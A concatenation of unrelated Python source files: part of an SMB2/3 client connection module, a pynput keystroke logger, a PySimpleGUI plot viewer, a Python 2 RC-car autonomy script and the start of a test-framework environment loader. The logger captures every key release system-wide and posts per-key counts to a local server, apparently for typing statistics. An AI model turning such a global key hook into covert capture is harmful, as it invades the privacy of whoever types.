if self.dialect >= Dialects.SMB_3_0_0:
c = cmac.CMAC(algorithms.AES(signing_key), backend=default_backend())
c.update(b_header)
signature = c.finalize()
else:
hmac_algo = hmac.new(signing_key, msg=b_header, digestmod=hashlib.sha256)
signature = hmac_algo.digest()[:16]
return signature
def _encrypt(self, b_data, session):
header = SMB2TransformHeader()
header['original_message_size'] = len(b_data)
header['session_id'] = session.session_id
encryption_key = session.encryption_key
if self.dialect >= Dialects.SMB_3_1_1:
cipher = self.cipher_id
else:
cipher = Ciphers.get_cipher(Ciphers.AES_128_CCM)
if cipher == aead.AESGCM:
nonce = os.urandom(12)
header['nonce'] = nonce + (b"\x00" * 4)
else:
nonce = os.urandom(11)
header['nonce'] = nonce + (b"\x00" * 5)
cipher_text = cipher(encryption_key).encrypt(nonce, b_data, header.pack()[20:])
signature = cipher_text[-16:]
enc_message = cipher_text[:-16]
header['signature'] = signature
header['data'] = enc_message
return header
def _compress(self, b_data, session):
header = SMB2CompressionTransformHeader()
header['original_size'] = len(b_data)
header['offset'] = 4294967295
header['data'] = smbprotocol.lznt1.compress(b_data)
return header
def _decompress(self, message):
dec = bytes(smbprotocol.lznt1.decompress(message['data'].get_value()))
return dec
def _decrypt(self, message):
if message['flags'].get_value() != 0x0001:
error_msg = "Expecting flag of 0x0001 but got %s in the SMB Transform Header Response" \
% format(message['flags'].get_value(), 'x')
raise SMBException(error_msg)
session_id = message['session_id'].get_value()
session = self.session_table.get(session_id, None)
if session is None:
error_msg = "Failed to find valid session %s for message decryption" % session_id
raise SMBException(error_msg)
if self.dialect >= Dialects.SMB_3_1_1:
cipher = self.cipher_id
else:
cipher = Ciphers.get_cipher(Ciphers.AES_128_CCM)
nonce_length = 12 if cipher == aead.AESGCM else 11
nonce = message['nonce'].get_value()[:nonce_length]
signature = message['signature'].get_value()
enc_message = message['data'].get_value() + signature
c = cipher(session.decryption_key)
dec_message = c.decrypt(nonce, enc_message, message.pack()[20:52])
return dec_message
def _send_smb2_negotiate(self, dialect, timeout):
self.salt = os.urandom(32)
if dialect is None:
neg_req = SMB3NegotiateRequest()
self.negotiated_dialects = [
Dialects.SMB_2_0_2,
Dialects.SMB_2_1_0,
Dialects.SMB_3_0_0,
Dialects.SMB_3_0_2,
Dialects.SMB_3_1_1
]
highest_dialect = Dialects.SMB_3_1_1
else:
if dialect >= Dialects.SMB_3_1_1:
neg_req = SMB3NegotiateRequest()
else:
neg_req = SMB2NegotiateRequest()
self.negotiated_dialects = [
dialect
]
highest_dialect = dialect
neg_req['dialects'] = self.negotiated_dialects
log.info("Negotiating with SMB2 protocol with highest client dialect "
"of: %s" % [dialect for dialect, v in vars(Dialects).items()
if v == highest_dialect][0])
neg_req['security_mode'] = self.client_security_mode
if highest_dialect >= Dialects.SMB_2_1_0:
log.debug("Adding client guid %s to negotiate request"
% self.client_guid)
neg_req['client_guid'] = self.client_guid
if highest_dialect >= Dialects.SMB_3_0_0:
log.debug("Adding client capabilities %d to negotiate request"
% self.client_capabilities)
neg_req['capabilities'] = self.client_capabilities
if highest_dialect >= Dialects.SMB_3_1_1:
int_cap = SMB2NegotiateContextRequest()
int_cap['context_type'] = \
NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES
int_cap['data'] = SMB2PreauthIntegrityCapabilities()
int_cap['data']['hash_algorithms'] = [
HashAlgorithms.SHA_512
]
int_cap['data']['salt'] = self.salt
log.debug("Adding preauth integrity capabilities of hash SHA512 "
"and salt %s to negotiate request" % self.salt)
enc_cap = SMB2NegotiateContextRequest()
enc_cap['context_type'] = \
NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES
enc_cap['data'] = SMB2EncryptionCapabilities()
supported_ciphers = Ciphers.get_supported_ciphers()
enc_cap['data']['ciphers'] = supported_ciphers
# remove extra padding for last list entry
# enc_cap['padding'].size = 0
# enc_cap['padding'] = b""
log.debug("Adding encryption capabilities of AES128 GCM and "
"AES128 CCM to negotiate request")
comp_cap = SMB2NegotiateContextRequest()
comp_cap['context_type'] = \
NegotiateContextType.SMB2_COMPRESSION_CAPABILITIES
comp_cap['data'] = SMB2CompressionCapabilities()
comp_cap['data']['compression_algorithms'] = CompressionAlgos.get_supported_ciphers()
comp_cap['padding'].size = 0
comp_cap['padding'] = b""
neg_req['negotiate_context_list'] = [
int_cap,
enc_cap,
comp_cap
]
log.info("Sending SMB2 Negotiate message")
log.debug(neg_req)
request = self.send(neg_req)
self.preauth_integrity_hash_value.append(request.message)
response = self.receive(request, timeout=timeout)
log.info("Receiving SMB2 Negotiate response")
log.debug(response)
# print(response['data'].get_value())
self.preauth_integrity_hash_value.append(response)
smb_response = SMB2NegotiateResponse()
smb_response.unpack(response['data'].get_value())
return smb_response
def _calculate_credit_charge(self, message):
"""
Calculates the credit charge for a request based on the command. If
connection.supports_multi_credit is not True then the credit charge
isn't valid so it returns 0.
The credit charge is the number of credits that are required for
sending/receiving data over 64 kilobytes, in the existing messages only
the Read, Write, Query Directory or IOCTL commands will end in this
scenario and each require their own calculation to get the proper
value. The generic formula for calculating the credit charge is
https://msdn.microsoft.com/en-us/library/dn529312.aspx
(max(SendPayloadSize, Expected ResponsePayloadSize) - 1) / 65536 + 1
:param message: The message being sent
:return: The credit charge to set on the header
"""
credit_size = MAX_PAYLOAD_SIZE
if (not self.supports_multi_credit) or (message.COMMAND == Commands.SMB2_CANCEL):
credit_charge = 0
elif message.COMMAND == Commands.SMB2_READ:
max_size = message['length'].get_value() + \
message['read_channel_info_length'].get_value() - 1
credit_charge = math.ceil(max_size / credit_size)
elif message.COMMAND == Commands.SMB2_WRITE:
max_size = message['length'].get_value() + \
message['write_channel_info_length'].get_value() - 1
credit_charge = math.ceil(max_size / credit_size)
elif message.COMMAND == Commands.SMB2_IOCTL:
max_in_size = len(message['buffer'])
max_out_size = message['max_output_response'].get_value()
max_size = max(max_in_size, max_out_size) - 1
credit_charge = math.ceil(max_size / credit_size)
elif message.COMMAND == Commands.SMB2_QUERY_DIRECTORY:
max_in_size = len(message['buffer'])
max_out_size = message['output_buffer_length'].get_value()
max_size = max(max_in_size, max_out_size) - 1
credit_charge = math.ceil(max_size / credit_size)
else:
credit_charge = 1
# python 2 returns a float where we need an integer
return int(credit_charge)
class Request(object):
def __init__(self, message, message_type, connection, session_id=None):
"""
[MS-SMB2] v53.0 2017-09-15
3.2.1.7 Per Pending Request
For each request that was sent to the server and is await a response
:param message: The message to be sent in the request
:param message_type: The type of message that is set in the header's data field.
:param connection: The Connection the request was sent under.
:param session_id: The Session Id the request was for.
"""
self.async_id = None
self.message = message
self.timestamp = datetime.now()
self.cancelled = False
# Used to contain the corresponding response from the server as the receiving in done in a separate thread.
self.response = None
# Used by the recv processing thread to say the response has been received and is ready for consumption.
self.response_event = threading.Event()
# Used to lock the request when the main thread is processing the PENDING result in case the background thread
# receives the final result and fires the event before main clears it.
self.response_event_lock = threading.Lock()
# Stores the message_ids of related messages that are sent in a compound request. This is only set on the 1st
# message in the request. Used when STATUS_STOPPED_ON_SYMLINK is set and we need to send the whole compound
# request again with the new path.
self.related_ids = []
# Cannot rely on the message values as it could be a related compound msg which does not set these values.
self.session_id = session_id
self._connection = connection
self._message_type = message_type # Used to rehydrate the message data in case it's needed again.
def cancel(self):
if self.cancelled is True:
return
message_id = self.message['message_id'].get_value()
log.info("Cancelling message %s" % message_id)
self._connection.send(SMB2CancelRequest(), sid=self.session_id, credit_request=0, message_id=message_id,
async_id=self.async_id)
self.cancelled = True
def get_message_data(self):
message_obj = self._message_type()
message_obj.unpack(self.message['data'].get_value())
return message_obj
def update_request(self, new_request):
self.async_id = new_request.async_id
self.message = new_request.message
self.timestamp = new_request.timestamp
self.response = new_request.response
self.response_event = new_request.response_event
self.response_event_lock = new_request.response_event_lock
self.related_ids = new_request.related_ids
|
logger.py | from pynput.keyboard import Key, Listener
from datetime import date
import json
import requests
import threading
DISTRIBUTION_FILE = 'distribution.json'
TIME_FILE = 'time.json'
CONVERT_FILE = 'convert.json'
REQUEST_URL = 'http://127.0.0.1:5000/new-data'
SAVE_COUNTER = 10
current_date = ''
time = {}
dist = {}
ignore = ['shift', 'shift_r', 'ctrl_l', 'ctrl_r', 'alt_l', 'alt_gr', 'backspace', 'delete', 'right', 'down', 'left', 'up']
counter = 0
last_key = ''
key_amount = 0
def prefix():
return '[Listener]'
def load():
global dist, time, key_amount
try:
with open(TIME_FILE, 'r') as f:
time = json.load(f)
with open(DISTRIBUTION_FILE, 'r') as f:
dist = json.load(f)
key_amount = count_keystrokes(dist)
except:
print('At least one JSON file could not be opened')
def save(dist, time):
try:
with open(DISTRIBUTION_FILE, 'w') as f:
json.dump(dist, f)
with open(TIME_FILE, 'w') as f:
json.dump(time, f)
except:
print('At least one JSON file could not be saved')
def check_date(current_date):
global dist, key_amount
temp_date = str(date.today().strftime('%d.%m.%Y'))
if temp_date == current_date:
return current_date
if current_date == '':
if len(list(time)) != 0:
return str(list(time)[-1])
time[temp_date] = 0
dist = {}
key_amount = 0
return temp_date
def count_keystrokes(dist):
c = 0
for key in dist:
c += dist[key]
return c
def on_release(key):
global counter, current_date, last_key, key_amount
current_date = check_date(current_date)
key = str(key)
old = key
ext = False
if key.startswith('Key.'):
key = key.split('.')[1]
elif key.startswith('\'\\x'):
key = key.replace('\'\\', '').replace('\'', '')
elif key.startswith('<'):
try:
n = int(key.replace('<', '').replace('>', ''))
if n > 47 and n < 97:
key = 'ctrl+alt+' + chr(n)
if key == 'ctrl+alt+A':
print('Exit due to CTRL+ALT+A')
ext = True
else:
key = 'ctrl+alt+' + n
except:
key = 'ctrl+alt+' + key.replace('<', '').replace('>', '')
else:
key = key.replace('\'', '')
key = key.replace('\\', '')
if key == 'ä':
key = 'ae'
elif key == 'ö':
key = 'oe'
elif key == 'ü':
key = 'ue'
elif key == 'Ä':
key = 'AE'
elif key == 'Ö':
key = 'OE'
elif key == 'Ü':
key = 'UE'
elif key == 'ß':
key = 'ss'
elif key == '§':
key = 'section-sign'
elif key == '%':
key = 'percent'
elif key == '&':
key = 'et'
elif key == '#':
key = 'hashtag'
elif key == '':
key = 'backslash'
elif '"' in key:
key = 'quotation-mark'
if ext:
exit(0)
print(old, '->', key)
if key not in ignore:
last_key = ''
key_amount += 1
if key in dist:
dist[key] += 1
else:
dist[key] = 1
else:
if last_key != key:
last_key = key
key_amount += 1
if key in dist:
dist[key] += 1
else:
dist[key] = 1
time[current_date] = key_amount
threading.Thread(target = send_request, args = [dist, time,]).start()
counter += 1
if counter >= SAVE_COUNTER:
counter = 0
threading.Thread(target=save, args=[dist, time, ]).start()
print(prefix(), 'dist saved:', key_amount, 'keystrokes')
def send_request(dist, time):
try:
requests.get(REQUEST_URL + '?distribution=' + str(dist).replace(' ', '').replace('\'', '%22') + '&time=' + str(time).replace(' ', '').replace('\'', '%22'))
except:
print("Server not running")
def start_logger():
load()
print(prefix(), 'Started key listener...')
with Listener(on_release=on_release) as listener:
listener.join()
if __name__ == '__main__':
start_logger()
|
AmpelPlot.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-plot/ampel-plot-app/AmpelPlot.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 16.11.2021
# Last Modified Date: 19.11.2021
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
import os, warnings, sys, psutil, PySimpleGUI as sg # type: ignore[import]
from tkinter import Menu, BooleanVar
from multiprocessing import Process, Value, freeze_support
from datetime import datetime
from ampel.plot.util.keyboard import MultiProcessingPynput
#from ampel.plot.util.keyboard import InlinePynput
from ampel.plot.util.clipboard import set_print, read_from_clipboard
from ampel.model.PlotBrowseOptions import PlotBrowseOptions
window = None
p = None
toggle_bool = False
def goodbye():
warnings.filterwarnings("ignore", category=UserWarning)
with warnings.catch_warnings():
warnings.filterwarnings(action="ignore", category=UserWarning, module=r"multiprocessing")
if p:
p.terminate()
if window:
window.close()
sys.exit(0)
def main(keyboard_callback) -> None:
global window, p
try:
sg.set_options(icon=resource_path("ampel_plot.png"))
sg.theme('SystemDefault1')
layout = [
[
sg.Multiline(
size=(85, 20), font=('Helvetica', 12), justification='left', key='text',
autoscroll=True, auto_refresh=True
)
],
[
*_ltxt('stack', 20, tooltip=' Max # of plots to display per tab/window '),
*_ltxt('scale', 1.0, tooltip=' Image scale factor '),
_chkbox('debug', tooltip=' Increase verbosity '),
_chkbox('html', default=True, tooltip=' HTML output format (includes plot titles) '),
_chkbox('Tight layout', key='tight', tooltip=' Suppress botton margins '),
_chkbox('png', enable_events=True, tooltip=' Convert SVG to PNG '),
sg.Column(
[[_itxt('dpi', 96, tooltip=' SVG quality '), _txt('dpi')]],
key='coldpi', pad=(0, 0), visible = False
)
],
[sg.Button('Apply', pad=10), sg.Push(), sg.Button('Exit', pad=10)]
]
window = sg.Window(
'AmpelPlot', layout,
finalize=True
)
set_print(_print)
on_top = BooleanVar()
menubar = Menu(window.TKroot)
vm = Menu(menubar, tearoff=0)
vm.add_checkbutton(
label="Always on top",
onvalue=1, offvalue=0, variable=on_top,
command=lambda: window.keep_on_top_set() if on_top.get() else window.keep_on_top_clear() # type: ignore
)
menubar.add_cascade(label="View ", menu=vm) # space in on purpose
window.TKroot.config(menu=menubar)
window.TKroot.protocol("WM_DELETE_WINDOW", goodbye)
window.TKroot.tk.createcommand('::tk::mac::Quit', goodbye)
window.TKroot.master.attributes("-fullscreen", True)
while True:
read_from_clipboard(
PlotBrowseOptions(
debug = window['debug'].get(),
html = window['html'].get(),
png = int(window['dpi'].get()) if window['png'].get() else None,
max_size = float(window['max_size'].get()),
scale = float(window['scale'].get()),
stack = int(window['stack'].get())
),
keyboard_callback = keyboard_callback,
gui_callback = window_callback,
exit_on_interrupt = False
)
except Exception as e:
import traceback
with open('AmpelPlot_error.log', 'w') as f:
f.write(f"{e}\n")
traceback.print_exc(file=f)
def _txt(txt, **kwargs):
return sg.Text(txt, expand_y = True, size=(None, 1), **kwargs)
def _itxt(k, v, **kwargs):
return sg.InputText(v, size=(4, 1), pad=(0, 0), key=k, **kwargs)
def _ltxt(k, v, **kwargs):
return _txt(k), _itxt(k, v, **kwargs)
def _chkbox(k, **kwargs):
return sg.Checkbox(k, expand_y = True, size=(None, 1), key=kwargs.pop('key', k), **kwargs)
def _print(*args):
el = window['text']
#el.update(disabled=False)
el.print(
datetime.now().strftime('[%d/%m/%Y %H:%M:%S] '),
text_color="#808080",
end = ""
)
if len(args) > 1:
el.print(args[0] + " ", end="")
el.print(" ".join(args[1:]), text_color="#4682B4")
else:
el.print(" ".join(args))
#window.read(timeout=10)
#el.update(disabled=True)
def window_callback():
global toggle_bool
event, values = window.read(timeout=10)
if event == 'Apply':
_print("Applying new config")
raise KeyboardInterrupt
elif event == 'png':
toggle_bool = not toggle_bool
window['coldpi'].update(visible=toggle_bool)
elif event == sg.WIN_CLOSED or event == 'Exit':
import warnings
warnings.filterwarnings("ignore", category=UserWarning)
with warnings.catch_warnings():
warnings.filterwarnings(action="ignore", category=UserWarning, module=r"multiprocessing")
goodbye()
def resource_path(relative_path):
return os.path.join(
getattr(sys, '_MEIPASS'),
#"..",
#"Resources",
relative_path
)
if __name__ == "__main__":
freeze_support()
if len([proc for proc in psutil.process_iter() if proc.name() == "AmpelPlot"]) > 1:
print("Exit...(AmpelPlot is already running)")
os._exit(1)
# Not running Pynput in a dedicated process result in a programm crash (Illegal instruction: 4)
v = Value('i', 0)
mpp = MultiProcessingPynput(v)
p = Process(target=mpp.run)
p.start()
#main(InlinePynput().is_ctrl_pressed)
main(mpp.is_ctrl_pressed)
|
autonomous_v5.py | import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
SIGMA = 0.33
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(100)
car.pause(300)
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(55, 55))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for predestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
while self.receiving:
# There's a chance that the Main thread can get to this point before the New thread begins streaming images.
# To account for this, we create the jpg variable but set to None, and keep checking until it actually has something.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# Object detection
obj_detection.detect(stop_classifier, gray, image)
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GuassianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# Neural network model makes prediciton
# prediction = self.model.predict(auto)
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
# cv2.putText(gray, "Model prediction: {}".format(prediction_english), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
self.server_socket.bind(('10.10.10.2', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
print 'Listening...'
self.server_socket.listen(0)
# Accept a single connection ('rb' is 'read binary')
self.connection = self.server_socket.accept()[0].makefile('rb')
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
# # if the thread indicator variable is set, stop the thread
# # and resource camera resources
# if self.stopped:
# self.connection.close()
# return
def read(self):
# return the frame most recently read
return self.frame
#
# def stop(self):
# # indicate that the thread should be stopped
# self.stopped = True
if __name__ == '__main__':
try:
# Create an instance of PiVideoStream class
video_stream = PiVideoStream()
except KeyboardInterrupt:
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating...\n'
car.pause(10000)
# Close video_stream thread.
video_stream = PiVideoStream()
video_stream.stop()
video_stream.connection.close()
# Close serial connection to Arduino controller.
ser = serial.Serial(port.device, 9600)
ser.close()
print '\nDone.\n'
|
common3.py | # Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``common3.py``
`Testlib common functionality version 3.x`
"""
# Python built-in imports
import sys
import json
import os
import itertools
import traceback
from threading import Thread
import pytest
# Testlib imports
from .custom_exceptions import TAFCoreException
from . import entry_template
from . import environment
from . import loggers
VERSION = "3.0"
# Accessible from other modules list of loaded classes from dev_ files.
custom_classes = {}
# Add soft exit with environment sanitizing before exit.
def softexit(message, env=None):
"""Sanitizing environment and exit py.test execution.
Args:
message(str): Exit message
env(Environment): Environment instance
"""
if env is not None:
env.sanitize()
pytest.exit(message)
pytest.softexit = softexit
# Environment is inherited from dict to provide backward compatibility with TAFv1 suites
class Environment(dict):
"""Main class of all test environment.
Notes:
This class has to be used as base fixture in all test cases.
It provides number of common methods to initialize, shutdown,
cleanup environment functions which basically call appropriate methods of particular device classes.
"""
class_logger = loggers.ClassLogger()
def __init__(self, opts=None, **kwargs):
"""Read configuration files and create device objects.
Args:
opts(OptionParser): py.test config.option object which contains all py.test cli options.
Raises:
TAFCoreException: unexpected entry_type
"""
super(Environment, self).__init__(**kwargs)
self.opts = opts
self._dict = {}
self.config = self._get_conf(self.opts.env)
self.setup = {}
if self.opts.setup:
self.setup = self._get_setup(self.opts.setup)
# Map acroname to conf id
self.dut_map = {}
# Map config Id to instance index
self.id_map = {}
# Environment properties
self.env_prop = {}
# Device classes
self.__dev = {}
# Map autoname to conf Id
self.autoname_map = {}
# Get device classes
device_module_names = self._find_dev_modules()
self._import_device_modules(device_module_names)
# Make loaded classes from dev_ file accessible for other modules
for key, value in self.__dev.items():
custom_classes[key] = value
# Create env config according to setup
new_config = [self.create_conf_entry(setup_entry) for setup_entry in self.setup['env']]
# create a set from related ids lists
related_ids = set(itertools.chain.from_iterable(
conf_entry.get('related_id', []) for conf_entry in new_config))
# Add related config entries from environment config if they are not already in new_config
new_config_ids = set(_x['id'] for _x in new_config)
# find the unadded related_ids.
new_related_ids = related_ids - new_config_ids
related_configs = [
next(_e for _e in self.config if _e['id'] == rid) for rid in new_related_ids]
new_config.extend(related_configs)
# Save updated config
self.config = new_config
self.class_logger.info("Preparing environment objects.")
# reading and appending config and creating instances
for entry in self.config:
self.class_logger.info(
"Creating {0}:{1}:{2}".format(entry['entry_type'], entry['instance_type'],
entry['id']))
# Append related configs
if "related_id" in entry:
entry['related_conf'] = self._append_related_confs(entry['related_id'])
# Creating setup entries instances
try:
ename = self.__dev[entry['entry_type']]['NAME']
except KeyError:
message = ("Unexpected value for entry_type: '%s' specified with id: '%s' " +
"added in config.") % (entry['entry_type'], entry['id'])
raise TAFCoreException(message)
# always create a switch objects so that
# all the switch related plugins that expect a switch attribute
# fail gracefully
if not hasattr(self, "switch"):
setattr(self, "switch", {})
if not hasattr(self, ename):
setattr(self, ename, {})
eid = len(getattr(self, ename)) + 1
# Append ID maps
self.dut_map["%s%s" % (self.__dev[entry['entry_type']]['LINK_NAME'], eid)] = entry['id']
# Create entry instance
getattr(self, ename)[eid] = self.__dev[entry['entry_type']][entry['instance_type']](
entry, self.opts)
getattr(self, ename)[eid].env = self
self.id_map[entry['id']] = getattr(self, ename)[eid]
# In case entry contains autoname Environment object will contain d_<autoname>
# attribute.
if entry.get('autoname', False):
# Append autoname and Id
setattr(self, "d_{0}".format(entry['autoname']), getattr(self, ename)[eid])
self.autoname_map[entry['autoname']] = entry['id']
# Pass required by entries related objects:
for entry in self.config:
if "related_id" in entry:
self.id_map[entry['id']].related_obj = dict(
[(_id, self.id_map[_id]) for _id in entry['related_id']])
# To support heterogeneous setup we need to support multiple Cross connection types,
# but allow user to be independent from this.
# Cross object automatically detects connection owner and forward it to proper cross instance.
self.cross = Cross(self.setup, self)
# Append connections lists for cross entries.
if "cross" in self.setup:
for c_id in self.setup['cross']:
self.id_map[c_id].connections = self.setup['cross'][c_id]
# TODO: Add transparent support of multiple TG instances in one.
def _import_device_modules(self, device_module_names):
for mod_name in device_module_names:
self.class_logger.debug("Loading %s module...", mod_name)
try:
new_module = __import__("testlib." + mod_name, fromlist=[mod_name])
except ImportError:
self.class_logger.warning("failed to import %s", mod_name, exc_info=True)
# ignore modules that can't load, e.g. dependency problems such as tempest
# instead failed when we try to instantiate the class
continue
# insert into global namespace
globals()[mod_name] = new_module
if new_module.ENTRY_TYPE and new_module.ENTRY_TYPE not in self.__dev:
self.__dev[new_module.ENTRY_TYPE] = {
"NAME": new_module.NAME,
"LINK_NAME": getattr(new_module, 'LINK_NAME', new_module.NAME),
}
for instance_name, entry_class in new_module.INSTANCES.items():
if issubclass(entry_class, entry_template.GenericEntry):
self.class_logger.debug(
"Found entry_type {0}, instance_type {1}.".format(new_module.ENTRY_TYPE,
instance_name))
self.__dev[new_module.ENTRY_TYPE][instance_name] = entry_class
def create_conf_entry(self, setup_entry):
# Search for id in environment config
# Add environment entry in setup if it's found, or leave setup entry as is.
conf_entry = next(
(cfg_e for cfg_e in self.config if cfg_e['id'] == setup_entry['id']),
setup_entry)
# Updating env keys according to setup
conf_entry.update(setup_entry)
return conf_entry
def _find_dev_modules(self):
# extract this so we can override in unittests
devices = []
testlib_path = os.path.dirname(__file__)
for root, dirname, filenames in os.walk(testlib_path):
for m in filenames:
if m.startswith("dev_") and m.endswith(".py"):
rel_path = os.path.relpath(os.path.join(root, m), testlib_path)
# create module name relative to testlib
# foo/dev_bar.py -> foo.dev_bar
devices.append(os.path.splitext(rel_path)[0].replace(os.sep, '.'))
return devices
def _get_conf(self, file_name=None):
"""Load environment config from file.
Args:
file_name(str): Name of a json file with a test environment configuration.
Raises:
TAFCoreException: configuration file is not found
IOError: error on reading configuration file
Returns:
dict: dict of the selected configuration.
Notes:
This method shouldn't be used outside this class. Use "config" attribute to access environment configuration.
"""
if not file_name:
self.class_logger.info("Environment file isn't set. All configurations will be taken from setup file.")
# Return empty dict
return dict()
path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="env")
if not path_to_config:
message = "Specified configuration file %s not found." % (file_name, )
raise TAFCoreException(message)
try:
config = json.loads(open(path_to_config).read(), encoding="latin-1")
except:
message = "Cannot read specified configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return config
def _get_setup(self, file_name):
"""Reads setup file based on provided name.
Args:
file_name(str): Name of a json file with setup.
Raises:
TAFCoreException: setup file is not found
IOError: error on reading setup file
Returns:
list[dict]: setup json content.
"""
if not file_name:
message = "Setup name must be specified."
raise TAFCoreException(message)
